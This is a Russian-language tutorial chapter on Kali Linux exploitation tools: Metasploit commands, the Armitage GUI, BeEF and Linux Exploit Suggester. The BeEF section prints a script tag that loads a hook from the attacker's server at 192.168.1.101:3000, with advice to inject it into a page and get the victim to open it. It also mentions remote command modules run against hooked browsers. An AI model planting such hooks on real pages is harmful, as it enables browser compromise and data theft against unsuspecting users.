Kali Linux - Инструменты эксплуатации

В этой главе мы узнаем о различных инструментах эксплуатации, предлагаемых Kali Linux.

Metasploit

Как мы упоминали ранее, Metasploit является продуктом Rapid7, и большинство ресурсов можно найти на их веб-странице www.metasploit.com . Он доступен в двух версиях - коммерческой и бесплатной. Различия между этими двумя версиями невелики, поэтому в этом случае мы будем использовать версию от сообщества (бесплатную).

Как этический хакер, вы будете использовать Kali Ditribution, в которую встроена версия сообщества Metasploit, а также другие этические хакерские инструменты, которые очень удобны благодаря экономии времени на установку. Однако, если вы хотите установить как отдельный инструмент, это приложение, которое можно установить в операционных системах, таких как Linux, Windows и OS X.

Сначала откройте консоль Metasploit в Kali. Затем перейдите в Приложения → Инструменты эксплуатации → Metasploit.

После его запуска вы увидите следующий экран, на котором версия Metasploit подчеркнута красным.

В консоли, если использовать справку или? символ, он покажет вам список с командами MSP вместе с их описанием. Вы можете выбрать, исходя из ваших потребностей и того, что вы будете использовать.

Еще одна важная административная команда: msfupdateкоторый помогает обновить metasploit последними эксплойтами уязвимостей. После выполнения этой команды в консоли вам придется подождать несколько минут до завершения обновления.

У него есть хорошая команда под названием «Поиск», которую вы можете использовать, чтобы найти то, что вам нужно, как показано на следующем снимке экрана. Например, я хочу найти эксплойты, связанные с Microsoft, и команда может бытьmsf >search name:Microsoft type:exploit.

Где «search» - это команда, «name» - это имя объекта, который мы ищем, а «type» - это тип сценария, который мы ищем.

Другая команда - «информация». Он предоставляет информацию о модуле или платформе, где он используется, кто является автором, справкой об уязвимости и ограничением полезной нагрузки, которое это может иметь.

Армитаж

Графический интерфейс Armitage для metasploit является дополнительным инструментом для metasploit. Он визуализирует цели, рекомендует эксплойты и предоставляет расширенные возможности после эксплуатации.

Давайте откроем его, но сначала нужно открыть и запустить консоль metasploit. Чтобы открыть Armitage, перейдите в Приложения → Инструменты для эксплойтов → Armitage.

Щелкните значок Connect кнопку, как показано на следующем снимке экрана.

Когда он откроется, вы увидите следующий экран.

Армитаж удобен в использовании. В области «Цели» перечислены все машины, которые вы обнаружили и с которыми работаете, взломанные цели окрашены в красный цвет с грозой.

После того, как вы взломали цель, вы можете щелкнуть по ней правой кнопкой мыши и продолжить изучение тем, что вам нужно сделать, например, изучить (просмотреть) папки.

В следующем графическом интерфейсе вы увидите представление для папок, которое называется консолью. Просто щелкнув папки, вы можете перемещаться по папкам без использования команд metasploit.

В правой части графического интерфейса находится раздел, в котором перечислены модули уязвимостей.

BeEF

BeEF означает Browser Exploitation Framework. Это инструмент тестирования на проникновение, который ориентирован на веб-браузер. BeEF позволяет профессиональному тестеру на проникновение оценить фактическое состояние безопасности целевой среды, используя векторы атак на стороне клиента.

Во-первых, вам нужно обновить пакет Kali, используя следующие команды:

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss

Для начала используйте следующую команду -

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef

Откройте браузер и введите логин и пароль: beef.

Хук BeEF - это файл JavaScript, размещенный на сервере BeEF, который должен запускаться в клиентских браузерах. Когда это происходит, он обращается к серверу BeEF, передавая много информации о цели. Это также позволяет запускать дополнительные команды и модули против цели. В этом примере расположениеBeEF крючок на http://192.168.1.101:3000/hook.js.

Чтобы атаковать браузер, включите перехватчик JavaScript на странице, которую будет просматривать клиент. Есть несколько способов сделать это, но самый простой - вставить следующее на страницу и каким-то образом заставить клиента открыть ее.

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>

После загрузки страницы вернитесь в панель управления BeEF и нажмите «Онлайн-браузеры» в левом верхнем углу. Через несколько секунд вы должны увидеть всплывающее окно с вашим IP-адресом, представляющее подключенный браузер. При наведении курсора на IP-адрес можно быстро получить такую ​​информацию, как версия браузера, операционная система и установленные плагины.

Чтобы удаленно запустить команду, щелкните «Собственный» хост. Затем в команде щелкните модуль, который вы хотите выполнить, и, наконец, щелкните «Выполнить».

Советчик эксплойтов Linux

Предлагает возможные эксплойты с учетом версии выпуска ‘uname -r’ операционной системы Linux.

Чтобы запустить его, введите следующую команду -

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 это версия ядра ОС Linux, которую мы хотим использовать.